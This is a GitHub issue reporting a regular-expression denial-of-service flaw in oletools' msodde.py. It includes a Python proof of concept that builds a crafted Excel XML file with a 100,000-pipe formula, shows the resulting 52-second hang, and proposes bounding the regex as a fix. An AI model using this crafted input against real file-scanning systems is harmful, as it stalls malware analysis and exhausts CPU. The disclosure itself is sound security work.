Skip to content

[Bug] Protential ReDoS in msodde.py #875

@ShangzhiXu

Description

@ShangzhiXu

Describe the bug
Hi team, thanks for your great work! I think I found a small vulnerability that might lead to DDoS in the system
At line 763 in msodde.py
the regex CSV_DDE_FORMAT = re.compile(r'\s*"?[=+-@](.+)\|(.+)!(.*)\s*') is vulnerable to ReDoS when it is used in match = re.match(XML_DDE_FORMAT, formula)

To Reproduce
I have a test file here and can be run directly

pipe_count = 100000

formula_string = "=" + "|" * pipe_count +"\u0085\n\u0085\t\u0085\u0085\u0085\u0085香"

xml_content = f'''<?xml version="1.0"?>
<?mso-application progid="Excel.Sheet"?>
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet"
          xmlns:o="urn:schemas-microsoft-com:office:office"
          xmlns:x="urn:schemas-microsoft-com:office:excel"
          xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet">
    <Worksheet ss:Name="Sheet1">
        <Table>
            <Row>
                <Cell ss:Formula="{formula_string}">
                </Cell>
            </Row>
        </Table>
    </Worksheet>
</Workbook>'''

file_name = "poc.xml"

try:
    with open(file_name, 'w', encoding='utf-8') as f:
        f.write(xml_content)


except IOError as e:
    pass

We can run this to generate a poc.xml
When we run
time msodde poc.xml

The result is like this

real    0m52.501s
user    0m52.478s
sys     0m0.020s

As observed, processing complex or potentially malicious XML files can cause the system to hang for over 50 seconds. This delay could lead to DoS conditions or high CPU usage in real-world scenarios where oletools is used to parse malicious files.

Although such XMLs are uncommon in typical use, since oletools focuses on malware analysis, maybe it could be helpful to consider improvements to better handle these scenarios.🤔.

Expected behavior
I think we can add a limit like replace .+ with .{0,200} or maybe divide the regex into multiple sub-regex? Maybe it can help to solve the recursion problem.

The core of the problem lies within (.+)\|(.+). The constructs like (.+) tend to eagerly match strings, leading to massive recursion and backtracking when faced with malicious input.

I tested a modification of the regex, and the performance improved significantly:

# after modify it to \s*"?[=+-@](.{0,200})\|(.{0,200})!(.*)\s*'
 execution time: 0.000428 s

Metadata

Metadata

Assignees

Projects

No projects

Relationships

None yet

Development

No branches or pull requests

Issue actions